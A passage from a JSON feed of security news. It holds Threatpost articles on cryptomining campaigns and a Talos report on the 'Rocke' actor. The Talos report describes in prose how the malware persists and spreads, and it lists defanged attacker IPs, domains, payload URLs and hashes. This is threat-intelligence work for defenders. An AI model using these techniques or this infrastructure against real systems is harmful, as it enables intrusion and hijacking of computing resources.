security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:50", "description": "Hackers behind cryptominer attacks are growing more aggressive and ruthless. Case and point, a cryptominer malware sample dubbed WinstarNssmMiner has been tracked in 500,000 attacks in the past three days, earning the crooks $28,000, according to researchers.\n\nWhat makes the cryptominer so vicious is the fact that, post infection, if a victim\u2019s AV software identifies WinstarNssmMiner and tries to remove it (or a user tries to disable it) the malware crashes the host system. WinstarNssmMiner targets Windows systems and leeches on to a system\u2019s processor power with a trojanized version of the XMRig mining program.\n\n\u201cThis malware is very hard to remove since victims\u2019 computers crash as soon as [it\u2019s] found,\u201d according to 360 Security researchers who published a [report on the malware Wednesday](<https://blog.360totalsecurity.com/en/cryptominer-winstarnssmminer-made-fortune-brutally-hijacking-computer/>). \u201cWe\u2019re quite surprised to see a cryptominer being so brutal to hijack victims\u2019 computers by adopting techniques of stubborn malware,\u201d researchers wrote.\n\nAn analysis of the cryptominer campaign reveals WinstarNssmMiner has already earned cybercriminals 133 Monero, or $28,000 based on current rates. Researchers did not specify how long it took criminals to earn that money.\n\nThose totals are a drop in the bucket for crypto-jacking campaigns. Malicious cryptomining that targets computers, servers or cloud-based systems have seen enormous growth over the last six months earning crooks millions in cryptocurrency. In February, hackers are estimated to have earned $3 million by exploiting a vulnerability ([CVE-2017-1000353](<https://jenkins.io/security/advisory/2017-04-26/>)) on servers running Jenkins software and installing Monero miners, researchers at [Check Point reported](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>).\n\nIt\u2019s unclear what the WinstarNssmMiner infection path is, but once the malware executes on a targeted system it launches a system process called svchost.exe, a process that manages system services. Next, it injects malicious code into svchost.exe.\n\n\u201cThere are actually two svchost.exe processes created. One performs the mining tasks. The other runs in the background for sensing the antivirus protection and avoiding detection,\u201d researchers said.\n\nThe svchost.exe process created for cryptomining has a process attribute of CriticalProcess, which means terminating the process crashes the system. A second svchost.exe process runs in the background and attempts to detect \u201cdecent\u201d antivirus software that developers know can identify the malware. \u201c[The] malware will quit automatically to avoid direct confrontation,\u201d researchers said.\n\nThe miner itself is based on the open source project, XMRig. XMRig is a legitimate cryptocurrency mining program known as a high performance Monero CPU miner. The miner is better known for its trojanized versions that have been adopted for criminal use. It has been used [in several recent malicious cryptocurrency campaigns](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) and one in January where it was installed via malware on [15 to 30 million endpoints](<https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-cryptocurrency-mining-operation-using-xmrig/>), according to a report by Palo Alto Networks.\n\nXMRig code was also used in recent attacks, such as the Jenkins miner, and also with malicious campaigns dubbed RubyMiner and WaterMiner, according to [an IBM X-Force Research report](<https://securityintelligence.com/xmrig-father-zeus-of-cryptocurrency-mining-malware/>).\n", "cvss3": {}, "published": "2018-05-16T19:56:09", "type": "threatpost", "title": "New Cryptominer Distributes XMRig in Aggressive Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353"], "modified": "2018-05-16T19:56:09", "id": "THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "href": "https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talosblog": [{"lastseen": "2018-08-31T19:09:28", "description": "_This post was authored by [David Liebenberg](<https://twitter.com/chinahanddave>). _\n\n \n \n\n\n## Summary\n\n \nCryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. \n \nIn this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors. \n \n\n\n## Introduction\n\n \nTalos has written widely about the issue of [cryptomining malware](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1535643040325000>) and how organizations should [protect systems](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html&sa=D&ust=1535643040326000>) against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as \"Rocke\" came to our attention. \n \nRocke actively engages in distributing and executing cyrptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. \n \n\n\n## Early campaigns\n\n \nThis threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. \n \nSeveral files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999.\" Subsequently, the Gitee user page transitioned to \"c-888.\" Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18.\" \n \nThe repositories on both Gitee and GitLab were identical. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. \n \nOnce the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space.\" This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java.\" The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if \"h32\" or \"h64\" is used to invoke \"java.\" \n \nAlthough we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform. \n \n\n\n## Recent campaign\n\n \nIn late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor. \n \nWe observed a wget request from our Struts2 honeypot for a file named \"0720.bin\" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting \"0720.bin\" along with 10 additional files: \"3307.bin,\" \"a7,\" \"bashf,\" \"bashg,\" \"config.json,\" \"lowerv2.sh,\" \"pools.txt,\" \"r88.sh,\" \"rootv2.sh\" and \"TermsHost.exe.\" We set about examining these files. \n \n \n[](<https://3.bp.blogspot.com/-Wv1QkpgsIM0/W4gFUMGqKFI/AAAAAAAAAx4/evI36ADu_wE3nWnR38WNm6I2gitFSIngwCLcBGAs/s1600/image5.png>) \n--- \nScreenshot of HFS system \n \n \n \n \nWe had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default. \n \nBoth \"0720.bin\" and \"3307.bin\" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that [Morpheus Labs](<https://morphuslabs.com/criminals-dont-read-instructions-or-use-strong-passwords-a09439617867&sa=D&ust=1535643040331000>) described, the hard-coded password was not only identical, but also located at the same offset. \n \n[](<https://3.bp.blogspot.com/-gkkEgex3fQE/W4gFfUPyS7I/AAAAAAAAAx8/FIip4n1BydgCUlwQQoEJKmNlfvJ3ShivQCLcBGAs/s1600/image3.png>) \n--- \nHard-coded password \n \n \n \n\"A7\" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as \"cranberry,\" \"yam,\" or \"kworker\"), as well as mining in general (such as \"minerd\" and \"cryptonight\"). It detects and uninstalls various Chinese AV, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called [\"libprocesshider,\"](<https://github.com/gianlucaborello/libprocesshider&sa=D&ust=1535643040332000>) which hides a file called \"x7\" using the ID preloader. The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading \"a7\" again from the actor's HFS at 118[.]24[.]150[.]172, and execute it. \n \n[](<https://3.bp.blogspot.com/-kHdZB-4kmko/W4gF3DsxTGI/AAAAAAAAAyE/hYEz3KrdFgIkb7EvjWOa_-K-iwZvnGmzACLcBGAs/s1600/image4.png>) \n--- \nExtract of Source Code of \"a7\" \n \n \n \n \n\"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor \"Rocke\" (note that for MinerGate, an email can be used in place of a Monero wallet number \u2014 it's simply the login email for the MinerGate platform). \"Pools.txt\" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first. \n \n\"Bashf\" is a variant of XMR-stak while \"bashg\" is a variant of XMRig. \n \n \n \n\"Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. \n \n\"R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh.\" \n \n\"TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the [Monero Silent Miner](<https://xmrminer.net/faq.php&sa=D&ust=1535643040335000>). This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls.\" The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. \n \nThe payload appears to be similar to one used by the Iron Cybercrime Group, as [reported](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>) by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group. \n \n\n\n## The actor\n\n \nThrough Rocke's MinerGate Monero wallet email [rocke@live.cn](<mailto:rocke@live.cn>), we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a[ leak](<http://www.moonsec.com/post-467.html&sa=D&ust=1535643040337000>) of user information from the Chinese security site FreeBuf that showed that a user named \"rocke\" was associated with the email [jxci@vip.qq.com](<mailto:jxci@vip.qq.com>). This suggested that they were one in the same. [4] \n \nRocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language. \n \nThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the \"jx\" in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province. \n \n\n\n### The GitHub\n\n \nWe identified a [GitHub page](<https://github.com/rocke&sa=D&ust=1535643040338000>) apparently associated with Rocke. The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one [repository folder](<https://github.com/rocke/rocke.github.io/tree/master/sample&sa=D&ust=1535643040339000>), we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner. \n \n\n\n[](<https://2.bp.blogspot.com/-SNtJa5UiPK4/W4gGCqRKeUI/AAAAAAAAAyI/5Q6jWCI6uS45BK8w0iehPGTNISfSnZIMQCLcBGAs/s1600/image2.png>)\n\n \n \nWe found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May. \n \nWe also found an [additional repository](<https://github.com/gosrs&sa=D&ust=1535643040339000>) through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it. \n \nThe files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads. \n \n\n\n[](<https://3.bp.blogspot.com/-RfGQEzxzT8U/W4gGOJCNnWI/AAAAAAAAAyQ/9LUooe3vkT4oisVEs5G9zakzcxEqLdirQCLcBGAs/s1600/image6.png>)\n\n \n \n\n\n[](<https://4.bp.blogspot.com/--PZgS5QMD4c/W4gGVIWDJxI/AAAAAAAAAyY/5HcEvufCv5UrUxV5E-F9btlI7knaiWH1QCLcBGAs/s1600/image1.png>)\n\n \n \nOne of the JavaScript files in the repository, named \"command.js,\" uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file \"dDNLQrsBUE.url\" dropped by \"TermsHost.exe.\" \n \nRocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers. \n \n\n\n## Conclusion\n\n \nBased on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates. \n \nDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals. \n \n\n\n## IOCs:\n\n \n \n\n\n### Earlier campaign:\n\n \n \n\n\n#### Attacking IPs targeting Struts:\n\n \n \n52[.]167[.]219[.]168: Attacking IP using repo at gitlab \n120[.]55[.]226[.]24: Attacking IP using repo at gitee \n \n\n\n#### Attacking IP targeting WebLogic:\n\n \n \n27[.]193[.]180[.]224 \n \n\n\n#### Attacking IPs targeting ColdFusion:\n\n \n \n112[.]226[.]250[.]77 \n27[.]210[.]170[.]197 \n112[.]226[.]74[.]162 \n \n\n\n#### Domains\n\n \n3389[.]space \n \n\n\n#### URLs\n\n \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/config[.]json \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/dir[.]dir \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/h32 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/upd \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/x86_64 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/h64 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/x \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/run \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/logo[.]jpg \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/cron[.]d \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/dir[.]dir \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/x \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/x86_64 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/run \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/upd \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/upd \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/x \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/cron[.]d \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/h64 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/config[.]json \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/config[.]json \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/run \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/h32 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/dir[.]dir \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/x86_64 \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/h32 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/h64 \nhxxp://93[.]174[.]93[.]149/[.]xxxzlol[.]tar[.]gz \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/logo[.]jpg \n \n\n\n#### Hashes:\n\n \nLogo.jpg: ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a \na: 6ec8201ef8652f7a9833e216b5ece7ebbf70380ebd367e3385b1c0d4a43972fb \ncron.d: f6a150acfa6ec9d73fdecae27069026ecf2d833eac89976289d6fa15713a84fe \ndir.dir: a20d61c3d4e45413b001340afb4f98533d73e80f3b47daec42435789d12e4027 \nh32: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 \nh64: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf \n \nlogo.jpg (from gitee[.]com): f1f041c61e3086da8157745ee01c280a8238a379ca5b4cdbb25c5b746e490a9b \n \nlogo.jpg (from gitlab[.]com): ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a \n \nrun: 0c358d826c4a32a8c48ce88eb073f505b555fc62bca6015f5270425c58a0d1c5 \nupd: 187d06f1e6020b6787264e2e700c46c463a7818f07db0b051687f3cba65dbe0b \nx (32-bit miner): 6e80a9d843faf27e239b1a767d29c7443972be1ddf5ff5f5f9fc9a2b55a161f5 \nx86_64 (64-bit miner): 2ad07f8d1985f00cd05dafacbe5b6a5b1e87a78f8ae8ecdf91c776651c88a612 \n \n\n\n### More recent campaign:\n\n \n \n\n\n#### IPs\n\n \n123[.]249[.]9[.]149: Issues get request for 0720.bin \n118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn \n \n\n\n#### Domains:\n\n \nsydwzl[.]cn \nblockbitcoin[.]com: Reached out to by Install.exe \ndazqc4f140wtl[.]cloudfront[.]net: file server \n3g2upl4pq6kufc4m[.]tk: file server \nd3goboxon32grk2l[.]tk: file server \nenjoytopic[.]tk: file server \nrealtimenews[.]tk: file server \n8282[.]space: older C2 \n \n\n\n#### Domains registered to Rocke (not all are necessarily malicious):\n\n \n \n5-xun[.]com \n88180585[.]com \nfirstomato[.]com \njxtiewei[.]com \nncyypx[.]net \n \n\n\n#### URLs\n\n \nhxxp://d20blzxlz9ydha[.]cloudfront[.]net/Install.exe \nhxxp://www[.]amazon[.]com:80/N4215/adj/amzn.us.sr.aps?sz=160x600&amp;oe=oe=ISO-8859-1;&amp;sn=12275&amp;s=3717&amp;dc_ref=http%3A%2F%2Fwww.amazon.com \nhxxp://www[.]amazon[.]com:80/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books \n \n\n\n#### Hashes\n\n \n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b 0720.bin \n38066751cb6c39691904ffbef86fe3bdfa737e4ba64add4dd90358245fa2b775 3307.bin \n89b3463664ff13ea77256094844c9cf69d3e408d3daf9ffad3aa18af39bab410 TermsHost.exe \nd341e3a9133e534ca35d5ccc54b8a79f93ff0c917790e7d5f73fedaa480a6b93 a7 \n442e4a8d35f9de21d5cbd9a695a24b9ac8120e548119c7f9f881ee16ad3761e6 bashf \n7674e0b69d848e0b9ff8b82df8671f9889f33ab1a664f299bcce13744e08954c bashg \n7051c9af966d1c55a4096e2af2e6670d4fc75e00b2b396921a79549fb16d03d4 lowerv2.sh \n2f5bf7f1ea7a84828aa70f1140774f3d4ce9985d05a676c8535420232e2af87e pools.txt \nba29d8a259d33d483833387fad9c7231fbb3beb9f4e0603b204523607c622a03 config.json \n7c2dbc0d74e01a5e7c13b4a41d3a1f7564c165bd532e4473acea6f46405d0889 r88.sh \nd44e767132d68fdb07c23c848ff8c28efe19d1b7c070161b7bd6c0ccfc858750 rootv2.sh \n35cb971daafd368b71ad843a4e0b81c80225ec20d7679cfbf78e628ebcada542 Install.exe \n654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190 ZZYO \nF808A42B10CF55603389945A549CE45EDC6A04562196D14F7489AF04688F12BC XbashY \n725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 reg9.sct \nd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6 m.png \nece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 hidden executable in m.png \n \n \n", "cvss3": {}, "published": "2018-08-30T08:26:00", "type": "talosblog", "title": "Rocke: The Champion of Monero Miners", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-31T17:22:22", "id": "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/e2oaIaRaI6k/rocke-champion-of-monero-miners.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": 